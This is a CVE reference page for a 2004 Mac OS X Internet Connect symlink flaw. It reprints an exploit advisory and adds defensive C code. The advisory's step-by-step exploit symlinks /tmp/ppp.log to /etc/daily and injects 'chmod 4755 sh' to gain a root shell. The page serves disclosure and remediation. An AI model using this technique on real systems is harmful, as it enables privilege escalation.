CPE (Common Platform Enumeration) is a standardized naming scheme for hardware, software and operating systems. A CPE name identifies and classifies a platform or software package uniquely from attributes such as vendor, product name, version, update, edition and language.
CWE (Common Weakness Enumeration) is a catalogue and categorisation of software weakness types. It serves as a common language for describing security weaknesses introduced at the architecture, design, code or implementation level that can lead to vulnerabilities.
CAPEC (Common Attack Pattern Enumeration and Classification) is a publicly available knowledge base documenting the common attack patterns adversaries use in cyberattacks. It aims to describe, in a structured way, the methods attackers use to exploit known weaknesses.
PPPDialer for Mac OS X 10.2.8 through 10.3.5 allows local users to overwrite system files via a symlink attack on PPPDialer log files.
CVE information

Metrics

Version | Score | Severity | CVSS vector                  | Source
V2      | 2.1   | Low      | AV:L/AC:L/Au:N/C:N/I:P/A:N   | nvd@nist.gov
EPSS
EPSS (Exploit Prediction Scoring System) is a scoring model that predicts the probability that a vulnerability will be exploited in the wild.
EPSS score
The EPSS model produces a probability between 0 and 1 (0% and 100%). The higher the score, the greater the estimated probability that the vulnerability will be exploited.
Date       | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2023-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | –       | –       | 1.92%                  | –                      | –
2022-02-13 | –       | –       | 1.92%                  | –                      | –
2022-04-03 | –       | –       | 1.92%                  | –                      | –
2022-06-26 | –       | –       | 1.92%                  | –                      | –
2022-11-13 | –       | –       | 1.92%                  | –                      | –
2022-11-20 | –       | –       | 1.92%                  | –                      | –
2022-12-11 | –       | –       | 1.92%                  | –                      | –
2022-12-18 | –       | –       | 1.92%                  | –                      | –
2022-12-25 | –       | –       | 1.92%                  | –                      | –
2023-01-01 | –       | –       | 1.92%                  | –                      | –
2023-02-12 | –       | –       | 1.92%                  | –                      | –
2023-03-12 | –       | –       | –                      | 0.04%                  | –
2024-06-02 | –       | –       | –                      | 0.04%                  | –
2025-01-19 | –       | –       | –                      | 0.04%                  | –
2025-03-18 | –       | –       | –                      | –                      | 0.28%
EPSS percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile has a higher EPSS score than 95% of all other scored CVEs. The percentile therefore compares a CVE's EPSS score with the rest of the population rather than stating an absolute probability.
Publication date: 2004-07-27 22:00 +00:00 Author: B-r00t EDB Verified: Yes
Date: 25.07.2004
Author: B-r00t. 2004.
Email: B-r00t <br00t blueyonder co uk>
Vendor: Apple
Operating System: OSX Panther (Possibly Previous Versions).
Application: Internet Connect.app
Tested: Panther 10.3.4 (Internet Connect v1.3)
Problem: Internet Connect allows any file on the file system to be altered.
Status: 0day! - Temporary Fix Included.
Description:
Apple's Internet Connect application creates a
'ppp.log' file in '/tmp/'. If the file already
exists it is opened in append mode. If it does
not exist a new file is created.
It is possible to trick Internet Connect into
appending data to any file on the filesystem by
creating a symlink file '/tmp/ppp.log' pointing
to the file to be altered.
If the file '/tmp/ppp.log' already exists, the
attack is not possible as the file is owned by
user 'root' and group 'wheel': -
$ ls -l /tmp/ppp.log
-rw-r--r-- 1 root wheel 807 24 Jul 23:44 /tmp/ppp.log
However, due to the Operating System clearing the
'/tmp' directory during system startup and also on
a regular basis due to system maintenance, it
becomes possible to form the attack as shown below:
First a file is created to represent a system file,
owned and only writable by user 'root'.
maki:~ # echo "TEST" > /etc/file_owned_by_root
maki:~ # ls -l /etc/file_owned_by_root
-rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root
maki:~ # cat /etc/file_owned_by_root
TEST
A symlink is now created in the '/tmp' directory to
point to the file to be altered. It is important to
realise that the link can be created as a non-'admin'
or 'root' user.
maki:/tmp $ id
uid=502(br00t) gid=502(br00t) groups=502(br00t)
maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
maki:/tmp $ ls -l ./ppp.log
lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /etc/file_owned_by_root
Now Internet Connect is opened. Under 'configuration'
choose 'Other'. Enter some text into the 'Telephone
Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.
'Cancel' can be clicked several seconds later.
Checking the original file '/etc/file_owned_by_root'
we see the following: -
maki:~ $ cat /etc/file_owned_by_root
TEST
Sun Jul 25 00:20:42 2004 : Version 2.0
Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
Sun Jul 25 00:20:58 2004 : Serial link disconnected.
As can be seen, data has been appended to the 'protected'
file.
Impact: It is possible for a local user to escalate their
privileges by appending data to specific system files.
In addition, a malicious user may be able to render the
machine unusable by corrupting important system files.
Exploit: This demonstration appends commands to the '/etc/daily'
file which is executed by default at 3:15AM each day.
An alternative attack might involve appending to any
of the files that are sourced at system start up such
as '/etc/rc.common'. This latter method is convenient
if the user is able to reboot the machine.
Create our link
maki:~ $ ln -s /etc/daily /tmp/ppp.log
Open Internet Connect.
Internal Modem -> Configuration -> Other
Internet Connect only allows certain characters to be
used for the telephone number. The background '&'
character allows our command string to execute amongst
the time and date strings also appended.
Telephone Number:
& cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &
Click 'Connect' ...*wait (10secs) ... 'Cancel'
Check the '/etc/daily' file.
maki:~ $ tail /etc/daily
if [ -f /etc/security ]; then
echo ""
echo "Running security:"
sh /etc/security 2>&1 | sendmail root
fi
Sun Jul 25 03:10:11 2004 : Version 2.0
Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &
Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
Sun Jul 25 03:10:17 2004 : Serial link disconnected.
Now sit back and wait for cron to execute '/etc/daily' at 03:15AM.
maki:~ $ date
Sun Jul 25 03:13:43 CEST 2004
maki:~ $ cd /bin
maki:/bin $ ls -l sh
-r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ date
Sun Jul 25 03:15:50 CEST 2004
maki:/bin $ ls -l sh
-rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ sh
maki:/bin # id
uid=502(br00t) euid=0(root) gid=502(br00t)
groups=502(br00t)
All that's left to do is clean up '/etc/daily' and remove the link '/tmp/ppp.log'.
FIX: The following commands serve to provide a temporary fix until Apple releases an official update.
Open a terminal: /Applications/Utilities/Terminal.app
Gain root access using 'sudo':
maki:~ $ sudo sh
Password:[YOUR PASSWORD]
maki:~ # whoami
root
You can copy and paste the following commands: -
/usr/bin/touch /tmp/ppp.log
echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily
echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common
These commands ensure that a '/tmp/ppp.log' file is
present to prevent a user from creating a link as shown
above. Alternatively the line:
/usr/bin/touch /tmp/ppp.log
can be added to each file '/etc/daily' and '/etc/rc.common'
manually using an editor and root privileges.
Shoutz: Marshal-L, Ruxsaw, Haggis & Kraft.
s1, Blex & the old #cheese posse (RIP).
Maz ... Good Luck For The Wedding!
# milw0rm.com [2004-07-28]
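The defect behind the advisory is a privileged process appending to a fixed path in a world-writable directory with a call that follows symlinks. The C program below is an added example, not code from the advisory, from Apple or from the aggregator page: vulnerable_append shows the pattern the advisory describes (fopen in append mode on a predictable /tmp name), safe_append shows the hardened open a practitioner would use instead, and demo reproduces the attack unprivileged inside a scratch directory, where a constructed file named "protected" stands in for /etc/file_owned_by_root and "ppp.log" is the link the attacker plants. The function names, the directory layout and the log line written are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (the behaviour the advisory describes): a fixed path
 * in /tmp is opened for append with a call that follows symlinks, so a
 * link planted there by any local user redirects the write to whatever
 * the privileged process is allowed to open. Returns 0 on success, -1 on error. */
int vulnerable_append(const char *log_path, const char *line)
{
    FILE *f = fopen(log_path, "a");
    if (f == NULL)
        return -1;
    int rc = (fputs(line, f) < 0) ? -1 : 0;
    if (fclose(f) != 0)
        rc = -1;
    return rc;
}

/* Hardened pattern: O_NOFOLLOW makes open() fail with ELOOP when the final
 * path component is a symlink, and the post-open fstat() refuses anything
 * that is not a plain file owned by the calling uid with a single link
 * (a hard link to a root-owned file would survive O_NOFOLLOW). */
int safe_append(const char *log_path, const char *line)
{
    int fd = open(log_path,
                  O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0644);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    size_t len = strlen(line);
    ssize_t n = write(fd, line, len);
    int rc = (n >= 0 && (size_t)n == len) ? 0 : -1;
    if (close(fd) != 0)
        rc = -1;
    return rc;
}

/* Re-creates the advisory's scenario in a scratch directory so it runs as
 * an ordinary user. Stores each append's return value and the protected
 * file's final contents in out. Returns 0 on success, -1 if setup failed. */
int demo(int *vuln_rc, int *safe_rc, char *out, size_t outlen)
{
    char dir[64];
    char protected_path[256], link_path[256];
    const char *payload = "Dialing & chmod 4755 sh &\n";  /* constructed log line */

    strcpy(dir, "/tmp/ppplog_demo_XXXXXX");
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "ppplog_demo_XXXXXX");           /* fall back to cwd */
        if (mkdtemp(dir) == NULL)
            return -1;
    }
    snprintf(protected_path, sizeof protected_path, "%s/protected", dir);
    snprintf(link_path, sizeof link_path, "%s/ppp.log", dir);

    FILE *f = fopen(protected_path, "w");             /* the "root-owned" target */
    if (f == NULL)
        return -1;
    fputs("TEST\n", f);
    fclose(f);
    if (symlink(protected_path, link_path) != 0)       /* attacker plants the link */
        return -1;

    *vuln_rc = vulnerable_append(link_path, payload);  /* 0: write lands in protected */
    *safe_rc = safe_append(link_path, payload);        /* -1: open() refuses the symlink */

    f = fopen(protected_path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(out, 1, outlen - 1, f);
    out[n] = '\0';
    fclose(f);

    unlink(link_path);
    unlink(protected_path);
    rmdir(dir);
    return 0;
}

int main(void)
{
    int v = 0, s = 0;
    char contents[512];
    if (demo(&v, &s, contents, sizeof contents) != 0) {
        perror("demo");
        return 1;
    }
    printf("vulnerable_append: %d\nsafe_append: %d\nprotected file now:\n%s",
           v, s, contents);
    return 0;
}
```

The advisory's temporary fix (pre-creating /tmp/ppp.log as root) closes the race only while that file exists; the open-side checks above hold regardless of directory state, and logging into a directory that is not world-writable removes the planting opportunity altogether.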